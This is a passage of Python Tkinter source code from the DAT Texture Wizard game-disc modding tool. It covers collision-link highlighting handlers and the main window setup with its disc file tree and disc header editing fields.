ttk.Checkbutton( self.renderingTab, text='Show Areas', variable=self.showAreas, command=self.updateAreaVisibility ).pack( pady=(40, 10) )
ttk.Checkbutton( self.renderingTab, text='Show Links', variable=self.showBasicLinks, command=self.toggleBasicLinkVisibility ).pack( pady=10 )
# ttk.Checkbutton( self.renderingTab, text='Show Pre Links', variable=self.showPreLinks, command=self.togglePreLinkVisibility ).pack( pady=10 )
# ttk.Checkbutton( self.renderingTab, text='Show Post Links', variable=self.showPostLinks, command=self.togglePostLinkVisibility ).pack( pady=10 )
def linkTabLinkHovered( self, event ):
""" Event handler for hovering over a link in the Links tab, which highlights the specific link in the canvas. """
hoverColor = '#e0e0a0' # Light yellow
if event.widget.winfo_class() == 'TButton':
lastWidget = None
for widget in self.linksInnerFrame.interior.winfo_children():
if widget == event.widget:
labelWidget = lastWidget
break
lastWidget = widget
else:
labelWidget = event.widget
# Change the background color of the highlighted widget
labelWidget['bg'] = hoverColor
self.highlightedLabels.append( labelWidget )
# Change the background color of the face in the canvas
collisionLink = labelWidget.link
self.renderPlane.itemconfigure( collisionLink.id, fill=hoverColor, outline=hoverColor )
self.highlightedId = collisionLink.id
def linkTabLinkUnhovered( self, event ):
""" Event handler for unhovering over a collision link in the canvas, or a link in the Links tab,
which unhighlights the specific link in the canvas. """
# Change the background color of the previously highlighted widget(s) back to normal
while self.highlightedLabels:
try: # These labels may no longer exist (if Delete button was used)
self.highlightedLabels.pop()['bg'] = 'SystemButtonFace' # The default
except: pass
# # Change the background color of the face in the canvas
if self.highlightedId:
for link in self.collisionLinks:
linkId = getattr( link, 'id', None )
if not linkId: continue # Some links may not be rendered
elif link.id == self.highlightedId:
self.renderPlane.itemconfigure( self.highlightedId, fill=link.fill, outline=link.outline )
self.highlightedId = None
break
def collSurfaceHovered( self, event ):
""" Event handler for hovering over a link in the canvas, which highlights the specific link in the Links tab (if visible). """
hoverColor = '#e0e0a0' # Light yellow
currentTab = self.window.nametowidget( self.structuresPanel.select() )
if currentTab not in ( self.spotsTab, self.linksTab ): return
# Get the label widget and link object
linkId = self.renderPlane.find_withtag( 'current' )[0]
for widget in self.linksInnerFrame.interior.grid_slaves( column=0 ):
# Get the link object; skipping those without it
collisionLink = getattr( widget, 'link', None )
if not collisionLink: continue
elif collisionLink.id == linkId: break # Found it
else: # Above loop didn't break; no matching collision link found
return
# Color the selected surface on the canvas
linkId = self.renderPlane.find_withtag( 'current' )[0]
self.renderPlane.itemconfig( linkId, fill=hoverColor, outline=hoverColor )
self.highlightedId = linkId
if currentTab == self.spotsTab:
spotsInnerFrame = self.spotsTab.winfo_children()[0]
spotLabels = spotsInnerFrame.interior.grid_slaves( column=0 )[:-1] # Excludes header label
spotLabels.reverse()
firstLabel = spotLabels[collisionLink.origPoints[0]]
secondLabel = spotLabels[collisionLink.origPoints[1]]
# Adjust the colors of the labels
firstLabel['bg'] = hoverColor
secondLabel['bg'] = hoverColor
self.highlightedLabels.extend( [firstLabel, secondLabel] )
# Scroll to the position of the first label
canvasHeight = spotsInnerFrame.canvas.bbox( 'all' )[-1]
scrollPosition = (firstLabel.winfo_y() - 40) / float( canvasHeight ) # Slight offset (-40), so the link is not at the absolute top
spotsInnerFrame.canvas.yview_moveto( scrollPosition )
else: # On the links tab
# Change the background color of the highlighted widget
widget['bg'] = hoverColor
self.highlightedLabels.append( widget )
# Scroll to the target link, so it's visible
canvasHeight = self.linksInnerFrame.canvas.bbox( 'all' )[-1]
scrollPosition = (widget.winfo_y() - 40) / float( canvasHeight ) # Slight offset (-40), so the link is not at the absolute top
self.linksInnerFrame.canvas.yview_moveto( scrollPosition )
def updateAreaVisibility( self ):
""" Shows or hides collision areas in the canvas. """
# Set render visibility
newVisibility = self.showAreas.get()
for area in self.areas:
area.render = newVisibility
# Re-draw the canvas display
self.renderPlane.delete( 'all' )
self.renderPlane.render()
def toggleBasicLinkVisibility( self ):
show = self.showBasicLinks.get()
for link in self.collisionLinks:
link.render = show
# Re-draw the canvas display
self.renderPlane.delete( 'all' )
self.renderPlane.render()
# def areaHovered( self, event ):
# print 'area hovered'
# def areaUnhovered( self, event ):
# print 'area unhovered'
# def deleteLink( self, linkIndex ):
# print 'removing link', linkIndex
# # Decrement the Link_Table_Entry_Count value in the coll_data structure
# newCollLinksCount = self.collStruct.getValues()[3] - 1
# globalDatFile.updateStructValue( self.collStruct, 3, newCollLinksCount )
# print 'coll count changed to', newCollLinksCount
# # deducedStructLength = globalDatFile.getStructLength( self.linkTable.offset )
# # collLinksLength = ( newCollLinksCount * 0x10 )
# # padding = deducedStructLength - ( newCollLinksCount * 0x10 )
# # globalDatFile.collapseDataSpace( self.linkTable.offset + collLinksLength, padding )
# # Remove the data for this link from the structure and file
# # linkDataStart = linkIndex * 0x10
# # self.linkTable.data = self.linkTable.data[:linkDataStart] + self.linkTable.data[linkDataStart+0x10:]
# # self.linkTable.length = len( self.linkTable.data )
# # self.linkTable.entryCount -= 1
# self.linkTable.removeEntry( linkIndex )
# print 'new struct data len:', hex( self.linkTable.length )
# # Check how much space is available and needed for this new struct data, and whether the space should be shrunk
# # deducedStructLength = globalDatFile.getStructLength( self.linkTable.offset )
# # self.linkTable.padding = deducedStructLength - self.linkTable.length
# # globalDatFile.collapseDataSpace( self.linkTable.offset + self.linkTable.length, self.linkTable.padding )
# # globalDatFile.setData( self.linkTable.offset, self.linkTable.data )
# # Remove this link from the collisions list and drawing canvas
# #targetLink = self.collisionLinks.pop( linkIndex )
# newCollLinks = []
# for link in self.collisionLinks:
# if link.index == linkIndex:
# canvasId = getattr( link, 'id', None )
# if canvasId:
# print 'deleting canvas id', canvasId
# self.renderPlane.delete( canvasId )
# else:
# newCollLinks.append( link )
# self.collisionLinks = newCollLinks
# self.renderPlane.shapes = self.collisionLinks + self.areas
# # Reload the links tab to remove the link from the GUI
# self.linksInnerFrame.clear()
# self.populateLinksTab()
# # Need to reinitialize file structures; reload the SA tab
# clearStructuralAnalysisTab()
# analyzeDatStructure()
#=============#
# ~ ~ GUI ~ ~ #
#=============#
class MainGui( Tk.Frame, object ):
def __init__( self ): # Build the interface
self.root = Tk.Tk()
self.root.withdraw() # Keeps the GUI minimized until it is fully generated
self._imageBank = {} # Repository for all GUI related images
self.root.tk.call( 'wm', 'iconphoto', self.root._w, self.imageBank('appIcon') )
self.defaultWindowWidth = 860
self.defaultWindowHeight = 640
self.root.geometry( str(self.defaultWindowWidth) + 'x' + str(self.defaultWindowHeight) + '+100+50' )
self.root.title( "DAT Texture Wizard - v" + programVersion )
self.root.minsize( width=370, height=416 )
self.dnd = TkDND( self.root ) # Set-up for drag-and-drop functionality
self.root.protocol( 'WM_DELETE_WINDOW', onProgramClose ) # Overrides the standard window close button.
# Used for other TopWindow creations.
self.root.imageFiltersWindow = None
self.root.helpWindow = None
self.root.aboutWindow = None
# Loads settings from persistent storage (settings.ini). Must be done before configuring the Settings menu
loadSettings()
# Set the default font size and color.
globalFontSize = int( settings.get( 'General Settings', 'globalFontSize' ) )
if generalBoolSettings['useAltFontColor'].get():
# User wants to use their own color
self.globalFontColor = settings.get( 'General Settings', 'altFontColor' )
try: # Make sure it's a valid color
self.root.winfo_rgb( self.globalFontColor ) # Returns an RGB tuple if successful
except:
msg( 'The alternate color, "' + self.globalFontColor + '", is not a valid color. The string should be written as #RRGGBB, '
'or a basic color such as, "blue", "teal", "orange", etc. The default font color will be used instead.' )
self.globalFontColor = '#071240'
else: self.globalFontColor = '#071240' # Default
for font in tkFont.names():
tkFont.nametofont( font ).configure( size=globalFontSize )
self.defaultSystemBgColor = self.root.cget( 'background' )
#self.root.option_add("*Font", "TkDefaultFont") # Changes all of the various used fonts to the default font.
# Apply the font color to the default font style class.
style = ttk.Style()
style.configure( '.', font="TkDefaultFont", foreground=self.globalFontColor )
style.configure( "Treeview.Heading", font="TkDefaultFont", foreground=self.globalFontColor )
style.configure( 'TLabel', justify='center' )
style.configure( 'Edited.TMenubutton', background='#faa' ) # For OptionMenu widgets (dunno why the name is so different :/)
# - Main Menu Bar & Context Menus.
self.menubar = Tk.Menu( self.root )
# Keyboard shortcut:
self.menubar.add_cascade( label='File', menu=fileMenu( self.menubar ), underline=0 ) # File [F]
self.menubar.add_cascade( label='Settings', menu=settingsMenu( self.menubar ), underline=0 ) # Settings [S]
self.menubar.add_cascade( label='Disc Operations', menu=isoMenuOptions( self.menubar ), underline=0 ) # Disc Operations [D]
self.menubar.add_cascade( label='Texture Operations', menu=textureMenuOptions( self.menubar ), underline=0 ) # Texture Operations [T]
toolsDropdown = Tk.Menu( self.menubar, tearoff=False ) # Tools [T]
self.menubar.add_cascade( menu=toolsDropdown, label='Tools', underline=0 )
toolsDropdown.add_command( label='Color Converter', underline=0, command=MeleeColorPicker ) # C
toolsDropdown.add_command( label='Image Data Length Calculator', underline=6, command=lambda: ImageDataLengthCalculator(Gui.root) ) # D
helpDropdown = Tk.Menu( self.menubar, tearoff=False ) # Help [H]
self.menubar.add_cascade( menu=helpDropdown, label='Help', underline=0 )
helpDropdown.add_command( label='General Help', underline=0, command=showHelpWindow ) # H
helpDropdown.add_command( label='View Program Usage', underline=5, command=showReadMeFile ) # R
helpDropdown.add_command( label='Support DTW', underline=0, command=showSupportWindow ) # S
helpDropdown.add_command( label='About DAT Texture Wizard', underline=0, command=showAboutWindow ) # A
self.root.config( menu=self.menubar )
self.menubar.bind( "<<MenuSelect>>", self.updateMainMenuOptions )
# - Main Tab Interface.
self.mainTabFrame = ttk.Notebook( self.root )
# Tab 1 | Disc File Tree
self.discTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.discTab, text=' Disc File Tree ' )
self.dnd.bindtarget( self.discTab, lambda event: dndHandler( event, 'discTab' ), 'text/uri-list' )
# Frame for the File Tree tab
isoFrameRow1 = ttk.Frame( self.discTab, padding="11 0 0 11" ) # Padding order: Left, Top, Right, Bottom.
isoFrameRow1.pack( fill='both', expand=1 )
# Disc shortcut links
fileTreeColumn = Tk.Frame( isoFrameRow1 )
isoQuickLinks = Tk.Frame( fileTreeColumn )
ttk.Label( isoQuickLinks, text='Disc Shortcuts:' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='System', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Characters', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Shortcuts', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Menus (CSS/SSS)', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Stages', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
for label in isoQuickLinks.winfo_children():
if label['text'] != '|': label.bind( '<1>', discFileTreeQuickLinks )
isoQuickLinks.pack( pady=1 )
# File Tree start
isoFileTreeWrapper = Tk.Frame( fileTreeColumn ) # Contains just the ISO treeview and its scroller (since they need a different packing than the above links).
self.isoFileScroller = Tk.Scrollbar( isoFileTreeWrapper )
self.isoFileTree = ttk.Treeview( isoFileTreeWrapper, columns=('description'), yscrollcommand=self.isoFileScroller.set )
self.isoFileTree.heading( '#0', anchor='center', text='File (Sorted by FST)', command=lambda: treeview_sort_column(self.isoFileTree, 'file', False) ) # , command=function
self.isoFileTree.column( '#0', anchor='center', minwidth=180, stretch=1, width=230 ) # "#0" is implicit in the columns definition above.
self.isoFileTree.heading( 'description', anchor='center', text='Description' )
self.isoFileTree.column( 'description', anchor='w', minwidth=180, stretch=1, width=312 )
self.isoFileTree.tag_configure( 'changed', foreground='red' )
self.isoFileTree.tag_configure( 'changesSaved', foreground='#292' ) # The 'save'-green color
self.isoFileTree.pack( side='left', fill='both', expand=1 )
self.isoFileScroller.config( command=self.isoFileTree.yview )
self.isoFileScroller.pack( side='left', fill='y' )
# Add treeview event handlers
self.isoFileTree.bind( '<<TreeviewSelect>>', onFileTreeSelect )
self.isoFileTree.bind( '<Double-1>', onFileTreeDoubleClick )
self.isoFileTree.bind( "<3>", createFileTreeContextMenu ) # Right-click
isoFileTreeWrapper.pack( fill='both', expand=1 )
fileTreeColumn.pack( side='left', fill='both', expand=1 )
# Add the background image to the file tree
self.isoFileTreeBg = Tk.Label( self.isoFileTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.isoFileTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
# ISO File Tree end / ISO Information panel begin
isoOpsPanel = ttk.Frame( isoFrameRow1, padding='0 9 0 0' ) # Padding order: Left, Top, Right, Bottom.
self.isoOverviewFrame = Tk.Frame( isoOpsPanel )
self.gameIdText = Tk.StringVar()
ttk.Label( self.isoOverviewFrame, textvariable=self.gameIdText, font="-weight bold" ).grid( column=0, row=0, padx=2 )
self.bannerCanvas = Tk.Canvas( self.isoOverviewFrame, width=96, height=32, borderwidth=0, highlightthickness=0 )
self.bannerCanvas.grid( column=1, row=0, padx=2 ) #, borderwidth=0, highlightthickness=0
self.bannerCanvas.pilImage = None
self.bannerCanvas.bannerGCstorage = None
self.bannerCanvas.canvasImageItem = None
self.isoOverviewFrame.columnconfigure( 0, weight=1 )
self.isoOverviewFrame.columnconfigure( 1, weight=1 )
self.isoOverviewFrame.pack( fill='x', padx=6, pady=11 )
self.isoPathShorthand = Tk.StringVar()
self.isoPathShorthandLabel = ttk.Label( isoOpsPanel, textvariable=self.isoPathShorthand )
self.isoPathShorthandLabel.pack()
internalFileDetails = ttk.Labelframe( isoOpsPanel, text=' File Details ', labelanchor='n' )
self.isoOffsetText = Tk.StringVar()
self.isoOffsetText.set( 'Disc Offset: ' )
ttk.Label( internalFileDetails, textvariable=self.isoOffsetText, width=27, anchor='w' ).pack( padx=15, pady=4 )
self.internalFileSizeText = Tk.StringVar()
self.internalFileSizeText.set( 'File Size: ' ) # The line break preserves space for the next line, which is used with multiple file (or folder) selections.
ttk.Label( internalFileDetails, textvariable=self.internalFileSizeText, width=27, anchor='w' ).pack( padx=15, pady=0 )
self.internalFileSizeLabelSecondLine = Tk.StringVar()
self.internalFileSizeLabelSecondLine.set( '' )
ttk.Label( internalFileDetails, textvariable=self.internalFileSizeLabelSecondLine, width=27, anchor='w' ).pack( padx=15, pady=0 )
internalFileDetails.pack( padx=15, pady=16, ipady=4 )
self.isoOpsPanelButtons = Tk.Frame( isoOpsPanel )
ttk.Button( self.isoOpsPanelButtons, text="Export", command=exportIsoFiles, state='disabled' ).grid( row=0, column=0, padx=7 )
ttk.Button( self.isoOpsPanelButtons, text="Import", command=importSingleIsoFile, state='disabled' ).grid( row=0, column=1, padx=7 )
ttk.Button( self.isoOpsPanelButtons, text="Browse Textures", command=browseTexturesFromDisc, state='disabled', width=18 ).grid( row=1, column=0, columnspan=2, pady=(7,0) )
ttk.Button( self.isoOpsPanelButtons, text="Analyze Structure", command=analyzeFileFromDisc, state='disabled', width=18 ).grid( row=2, column=0, columnspan=2, pady=(7,0) )
self.isoOpsPanelButtons.pack( pady=2 )
# Add the Magikoopa image
kamekFrame = Tk.Frame( isoOpsPanel )
ttk.Label( kamekFrame, image=self.imageBank('magikoopa') ).place( relx=0.5, rely=0.5, anchor='center' )
kamekFrame.pack( fill='both', expand=1 )
isoOpsPanel.pack( side='left', fill='both', expand=1 )
# Tab 2 | Disc Details
self.discDetailsTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.discDetailsTab, text=' Disc Details ' )
self.dnd.bindtarget( self.discDetailsTab, lambda event: dndHandler( event, 'discTab' ), 'text/uri-list' ) # Drag-and-drop functionality treats this as the discTab
# The start of row 1
self.discDetailsTab.row1 = ttk.Frame( self.discDetailsTab, padding=12 )
ttk.Label( self.discDetailsTab.row1, text=" ISO / GCM:" ).pack( side='left' )
self.isoDestination = Tk.StringVar()
isoDestEntry = ttk.Entry( self.discDetailsTab.row1, textvariable=self.isoDestination, takefocus=False )
isoDestEntry.pack( side='left', fill='x', expand=1, padx=12 )
isoDestEntry.bind( '<Return>', openIsoDestination )
self.discDetailsTab.row1.pack( fill='x' )
# The start of row 2
self.discDetailsTab.row2 = ttk.Frame( self.discDetailsTab, padding=0 ) # Padding order: Left, Top, Right, Bottom.
self.discDetailsTab.row2.padx = 5
self.discDetailsTab.row2.gameIdLabel = ttk.Label( self.discDetailsTab.row2, text='Game ID:' )
self.discDetailsTab.row2.gameIdLabel.grid( column=0, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
self.gameIdTextEntry = DisguisedEntry( self.discDetailsTab.row2, respectiveLabel=self.discDetailsTab.row2.gameIdLabel,
background=self.defaultSystemBgColor, textvariable=self.gameIdText, width=8 )
self.gameIdTextEntry.grid( column=1, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
self.gameIdTextEntry.offset = 0
self.gameIdTextEntry.maxByteLength = 6
self.gameIdTextEntry.updateName = 'Game ID'
self.gameIdTextEntry.targetFile = 'boot.bin'
self.gameIdTextEntry.bind( '<Return>', updateDiscDetails )
ttk.Label( self.discDetailsTab.row2, image=self.imageBank('gameIdBreakdownImage') ).grid( column=2, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
consoleIdText = Tk.StringVar()
gameCodeText = Tk.StringVar()
regionCodeText = Tk.StringVar()
makerCodeText = Tk.StringVar()
ttk.Label( self.discDetailsTab.row2, text='Console ID:' ).grid( column=3, row=0, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=consoleIdText, width=3 ).grid( column=4, row=0, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Game Code:' ).grid( column=3, row=1, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=gameCodeText, width=3 ).grid( column=4, row=1, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Region Code:' ).grid( column=3, row=2, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=regionCodeText, width=3 ).grid( column=4, row=2, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Maker Code:' ).grid( column=3, row=3, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=makerCodeText, width=3 ).grid( column=4, row=3, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Separator( self.discDetailsTab.row2, orient='vertical' ).grid( column=5, row=0, sticky='ns', rowspan=4, padx=self.discDetailsTab.row2.padx, pady=6 )
self.bannerCanvas2 = Tk.Canvas( self.discDetailsTab.row2, width=96, height=32, borderwidth=0, highlightthickness=0 )
self.bannerCanvas2.grid( column=6, row=1, rowspan=2, padx=self.discDetailsTab.row2.padx )
self.bannerCanvas2.pilImage = None
self.bannerCanvas2.bannerGCstorage = None
self.bannerCanvas2.canvasImageItem = None
bannerImportExportFrame = ttk.Frame( self.discDetailsTab.row2 )
bannerExportLabel = ttk.Label( bannerImportExportFrame, text='Export', foreground='#00F', cursor='hand2' )
bannerExportLabel.bind( '<1>', exportBanner )
bannerExportLabel.pack( side='left' )
ttk.Label( bannerImportExportFrame, text=' | ' ).pack( side='left' )
bannerImportLabel = ttk.Label( bannerImportExportFrame, text='Import', foreground='#00F', cursor='hand2' )
bannerImportLabel.bind( '<1>', importImageFiles )
bannerImportLabel.pack( side='left' )
bannerImportExportFrame.grid( column=6, row=3, padx=self.discDetailsTab.row2.padx )
ttk.Separator( self.discDetailsTab.row2, orient='vertical' ).grid( column=7, row=0, sticky='ns', rowspan=4, padx=self.discDetailsTab.row2.padx, pady=6 )
self.isoVersionText = Tk.StringVar()
self.isoFileCountText = Tk.StringVar()
self.isoFilesizeText = Tk.StringVar()
self.isoFilesizeTextLine2 = Tk.StringVar()
ttk.Label( self.discDetailsTab.row2, text='Disc Revision:' ).grid( column=8, row=0, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoVersionText ).grid( column=9, row=0, sticky='w', padx=self.discDetailsTab.row2.padx )
# The 20XX Version label will be here, at column 8/9, row 1, if the disc is 20XX
ttk.Label( self.discDetailsTab.row2, text='Total File Count:' ).grid( column=8, row=2, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFileCountText ).grid( column=9, row=2, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Disc Size:' ).grid( column=8, row=3, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFilesizeText ).grid( column=9, row=3, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFilesizeTextLine2 ).grid( column=8, row=4, columnspan=2, sticky='e', padx=self.discDetailsTab.row2.padx )
# Set cursor hover bindings for the help text
previousLabelWidget = ( None, '' )
for widget in self.discDetailsTab.row2.winfo_children(): # Widgets will be listed in the order that they were added to the parent
if widget.winfo_class() == 'TLabel' and ':' in widget['text']: # Bindings for the preceding Label
updateName = widget['text'].replace(':', '')
widget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousLabelWidget = ( widget, updateName )
elif previousLabelWidget[0]: # Bindings for the labels displaying the value/info
widget.bind( '<Enter>', lambda event, helpTextName=previousLabelWidget[1]: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousLabelWidget = ( None, '' )
elif widget.grid_info()['row'] == '4': # For the second label for isoFilesize
widget.bind( '<Enter>', lambda event: setDiscDetailsHelpText('Disc Size') )
widget.bind( '<Leave>', setDiscDetailsHelpText )
self.discDetailsTab.row2.pack( padx=15, pady=0, expand=1 )
self.discDetailsTab.row2.columnconfigure( 2, weight=0 ) # Allows the middle column (the actual text input fields) to stretch with the window
self.discDetailsTab.row2.columnconfigure( 4, weight=1 )
self.discDetailsTab.row2.columnconfigure( 5, weight=0 )
self.discDetailsTab.row2.columnconfigure( 6, weight=1 )
self.discDetailsTab.row2.columnconfigure( 7, weight=0 )
self.discDetailsTab.row2.columnconfigure( 8, weight=1 )
virtualLabel = ttk.Label( self.discDetailsTab, text='0,000,000,000 bytes' ) # Used to figure out how much space various fonts/sizes will require
predictedComfortableWidth = int( virtualLabel.winfo_reqwidth() * 1.2 ) # This should be plenty of space for the total disc size value.
self.discDetailsTab.row2.columnconfigure( 9, weight=1, minsize=predictedComfortableWidth )
# The start of row 3
self.discDetailsTab.row3 = Tk.Frame( self.discDetailsTab ) # Uses a grid layout for its children
self.shortTitle = Tk.StringVar()
self.shortMaker = Tk.StringVar()
self.longTitle = Tk.StringVar()
self.longMaker = Tk.StringVar()
borderColor1 = '#b7becc'; borderColor2 = '#0099f0'
ttk.Label( self.discDetailsTab.row3, text='Image Name:' ).grid( column=0, row=0, sticky='e' )
self.gameName1Field = Tk.Text( self.discDetailsTab.row3, height=3, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0 )
gameName1FieldScrollbar = Tk.Scrollbar( self.discDetailsTab.row3, command=self.gameName1Field.yview ) # This is used instead of just a ScrolledText widget because .getattr() won't work on the latter
self.gameName1Field['yscrollcommand'] = gameName1FieldScrollbar.set
self.gameName1Field.grid( column=1, row=0, columnspan=2, sticky='ew' )
gameName1FieldScrollbar.grid( column=3, row=0 )
self.gameName1Field.offset = 0x20; self.gameName1Field.maxByteLength = 992; self.gameName1Field.updateName = 'Image Name'; self.gameName1Field.targetFile = 'boot.bin'
ttk.Label( self.discDetailsTab.row3, text='992' ).grid( column=4, row=0 )
textWidgetFont = self.gameName1Field['font']
ttk.Label( self.discDetailsTab.row3, text='Short Title:' ).grid( column=0, row=1, sticky='e' )
gameName2Field = Tk.Entry( self.discDetailsTab.row3, width=32, textvariable=self.shortTitle, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
gameName2Field.grid( column=1, row=1, columnspan=2, sticky='w' )
gameName2Field.offset = 0x1820; gameName2Field.maxByteLength = 32; gameName2Field.updateName = 'Short Title'; gameName2Field.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='32' ).grid( column=4, row=1 )
ttk.Label( self.discDetailsTab.row3, text='Short Maker:' ).grid( column=0, row=2, sticky='e' )
developerField = Tk.Entry( self.discDetailsTab.row3, width=32, textvariable=self.shortMaker, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
developerField.grid( column=1, row=2, columnspan=2, sticky='w' )
developerField.offset = 0x1840; developerField.maxByteLength = 32; developerField.updateName = 'Short Maker'; developerField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='32' ).grid( column=4, row=2 )
ttk.Label( self.discDetailsTab.row3, text='Long Title:' ).grid( column=0, row=3, sticky='e' )
fullGameTitleField = Tk.Entry( self.discDetailsTab.row3, width=64, textvariable=self.longTitle, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
fullGameTitleField.grid( column=1, row=3, columnspan=2, sticky='w' )
fullGameTitleField.offset = 0x1860; fullGameTitleField.maxByteLength = 64; fullGameTitleField.updateName = 'Long Title'; fullGameTitleField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='64' ).grid( column=4, row=3 )
ttk.Label( self.discDetailsTab.row3, text='Long Maker:' ).grid( column=0, row=4, sticky='e' )
devOrDescField = Tk.Entry( self.discDetailsTab.row3, width=64, textvariable=self.longMaker, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
devOrDescField.grid( column=1, row=4, columnspan=2, sticky='w' )
devOrDescField.offset = 0x18a0; devOrDescField.maxByteLength = 64; devOrDescField.updateName = 'Long Maker'; devOrDescField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='64' ).grid( column=4, row=4 )
ttk.Label( self.discDetailsTab.row3, text='Comment:' ).grid( column=0, row=5, sticky='e' )
self.gameDescField = Tk.Text( self.discDetailsTab.row3, height=2, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0 )
self.gameDescField.grid( column=1, row=5, columnspan=2, sticky='ew' )
self.gameDescField.offset = 0x18e0; self.gameDescField.maxByteLength = 128; self.gameDescField.updateName = 'Comment'; self.gameDescField.targetFile = 'opening.bnr'
self.gameDescField.bind( '<Shift-Return>', disallowLineBreaks )
ttk.Label( self.discDetailsTab.row3, text='128' ).grid( column=4, row=5 )
ttk.Label( self.discDetailsTab.row3, text='Encoding:' ).grid( column=0, row=6, sticky='e' )
self.discDetailsTab.encodingFrame = ttk.Frame( self.discDetailsTab.row3 )
self.countryCode = Tk.StringVar()
self.countryCode.set( 'us' ) # This is just a default. Officially set when a disc is loaded.
Tk.Radiobutton( self.discDetailsTab.encodingFrame, text='English/EU (Latin_1)', variable=self.countryCode, value='us', command=reloadBanner ).pack( side='left', padx=(9,6) )
Tk.Radiobutton( self.discDetailsTab.encodingFrame, text='Japanese (Shift_JIS)', variable=self.countryCode, value='jp', command=reloadBanner ).pack( side='left', padx=6 )
self.discDetailsTab.encodingFrame.grid( column=1, row=6, sticky='w' )
ttk.Label( self.discDetailsTab.row3, text='Max Characters/Bytes ^ ' ).grid( column=2, row=6, columnspan=3, sticky='e' )
# Add event handlers for the updating function and help/hover text (also sets x/y padding)
children = self.discDetailsTab.row3.winfo_children()
previousWidget = children[0]
for widget in children:
widget.grid_configure( padx=4, pady=3 )
updateName = getattr( widget, 'updateName', None )
if updateName:
# Cursor hover bindings for the preceding Label
previousWidget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
previousWidget.bind( '<Leave>', setDiscDetailsHelpText )
# Data entry (pressing 'Enter') and cursor hover bindings for the text entry field
widget.bind( '<Return>', updateDiscDetails )
widget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousWidget = widget
self.discDetailsTab.row3.columnconfigure( 1, weight=1 ) # Allows the middle column (the actual text input fields) to stretch with the window
self.discDetailsTab.row3.pack( fill='both', expand=1, padx=15, pady=4 )
# The start of row 4
self.discDetailsTab.textHeightAssementWidget = ttk.Label( self.root, text=' \n \n \n ' )
self.discDetailsTab.textHeightAssementWidget.pack( side='bottom' )
self.discDetailsTab.textHeightAssementWidget.update()
theHeightOf4Lines = self.discDetailsTab.textHeightAssementWidget.winfo_height() # A dynamic value for differing system/user font sizes
self.discDetailsTab.textHeightAssementWidget.destroy() # The above widget won't even be visible for a moment, because the application is minimized until drawing is complete.
ttk.Separator( self.discDetailsTab, orient='horizontal' ).pack( fill='x', expand=1, padx=30 )
self.discDetailsTab.row4 = ttk.Frame( self.discDetailsTab, height=theHeightOf4Lines, padding='0 0 0 12' ) # Padding order: Left, Top, Right, Bottom.
self.discDetailsTabHelpText = Tk.StringVar()
self.discDetailsTabHelpText.set( "Hover over an item to view information on it.\nPress 'Enter' to submit changes in a text input field before saving." )
self.discDetailsTab.helpTextLabel = ttk.Label( self.discDetailsTab.row4, textvariable=self.discDetailsTabHelpText, wraplength=680 ) #, background='white'
